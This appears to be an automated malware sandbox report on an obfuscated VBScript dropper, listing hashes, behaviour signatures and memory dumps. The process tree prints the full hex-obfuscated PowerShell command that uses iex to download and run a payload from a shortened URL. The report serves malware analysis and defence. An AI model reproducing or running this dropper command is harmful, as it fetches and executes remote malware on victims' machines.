Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
04-03-2022 19:23
General
-
Target
ANVJYRGCEHLJVEQHRRQKR.vbs
-
Size
5KB
-
MD5
b8e6f98016f0cbb8ab5b6d8699538648
-
SHA1
fd72b20ec5ecf894454f319808582b43b769df05
-
SHA256
9841a5ee76188c7c50f2438e125fa6d60416704e7d40885571491cec4729dd90
-
SHA512
c67f7254b27a61e1a674e64f7aab56c1ee0aaeebcfe451343d8375e687516bfad6e9d002039d446b5955c28a13a46741ba00d72a5f25de9c2dc32e76f769d6f3
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://rebrand.ly/rlzgijk
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 2 IoCs
-
Drops file in System32 directory 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ANVJYRGCEHLJVEQHRRQKR.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $Hx = 'https://rebrand.ly/rlzgijk'; iex (( (20, 22,20,24 ,28, 20, 73, 65, 54, '2d',69, 74, 45 ,'6d' ,20 ,27, 76 ,41 , 52 ,69 ,41 , 62 , '6c' , 65 , '3a','4f',66,53, 27,20, 20,27 , 27,20, 29 , 20 , 22 , '2b' , 20 , '5b' ,53 , 54,52,49 , '6e' , 47 ,'5d' , 28 ,27 ,34 , 39,67, 34 , 35 ,69 , 35 , 38 , '4b', 32, 38, '4b', 34 , 65 , 40 ,36, 35 , 67 ,37 ,37 , 69, 32 ,64 ,52,34, 66,'4b', 36, 32,53 , 36, 61 , '7d' , 36 ,35,67, 36,33 , 52,37 ,34 ,'5f' , 32,30 ,67,34 , 65 ,53,36 , 35 , 67 ,37, 34 , 53,32 ,65 , '7d', 35 ,37 , '4b', 36 ,35 , '5f' , 36 ,32, 52,34,33 ,67 ,36,63 , '4b',36 , 39 , 53, 36 , 35 ,69,36 , 65, 67 , 37,34, 53 , 32, 39 ,67 , 32, 65 ,67,34,34, 40 , 36, 66,53 , 37 , 37 , 40,36 ,65, '5f' ,36, 63 ,53 , 36,66,69, 36 , 31, '4b' , 36 , 34 ,40, 35 , 33 , '4b' , 37 ,34 , 67,37,32, 69 , 36, 39, 67 ,36,65 , '7d',36, 37 ,'7d' ,32 ,38,'5f' ,32,34 ,'7d' , 34,38,40 ,37 ,38, '7d' ,32,39 , 27, '2e', 53 ,50 ,'4c',49 ,54,28 ,27 ,'7d' , '4b', 67 , 69,40, '5f' , 52 , 53 , 27, 29 ,20 ,'7c' ,20, 25 ,'7b',20, 28, 20 , '5b' ,43, 68 , 61, 52 ,'5d' ,20, 28,'5b',43, '6f' , '6e' , 76, 65 ,72 ,54 , '5d' , '3a' , '3a', 74,'4f' , 49 ,'6e' , 54 , 31 ,36 ,28,28 ,20 , '5b' ,53 , 74,72, 69, '4e' ,47, '5d' ,24 , '5f',29, '2c' ,31,36 , 29, 20,29, 29 ,'7d' , 20 ,29,20 , '2b',22 , 24 , 28,73 ,45, 54,'2d', 49,74 , 65 ,'4d' , 20 ,20, 27, 56 ,61, 52,69 , 61, 42,'4c' ,65,'3a','6f', 46,53,27 ,20 , 27 ,20,27, 20 , 29 , 20 ,22 ,20, '7c', 26, 20 , 28 , 20, 24 , 50, 73 , 48, '6f','6d', 65, '5b' ,32 ,31,'5d' , '2b', 24, 70,53 ,48,'6f' , '4d' , 65 , '5b' ,33 ,30 , '5d' ,'2b',27, 78, 27 ,29)|forEAch-objEcT {([ConveRT]::toint16( ([stRinG]$_ ) ,16 )-AS[cHar])} ) -joIN '' )1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/384-54-0x000007FEFB531000-0x000007FEFB533000-memory.dmpFilesize
8KB
-
memory/384-55-0x000007FEF2720000-0x000007FEF327D000-memory.dmpFilesize
11.4MB
-
memory/384-56-0x000007FEF4B90000-0x000007FEF552D000-memory.dmpFilesize
9.6MB
-
memory/384-57-0x00000000028C0000-0x00000000028C2000-memory.dmpFilesize
8KB
-
memory/384-58-0x000007FEF4B90000-0x000007FEF552D000-memory.dmpFilesize
9.6MB
-
memory/384-59-0x00000000028CB000-0x00000000028EA000-memory.dmpFilesize
124KB
-
memory/384-60-0x00000000028C2000-0x00000000028C4000-memory.dmpFilesize
8KB
-
memory/384-61-0x00000000028C4000-0x00000000028C7000-memory.dmpFilesize
12KB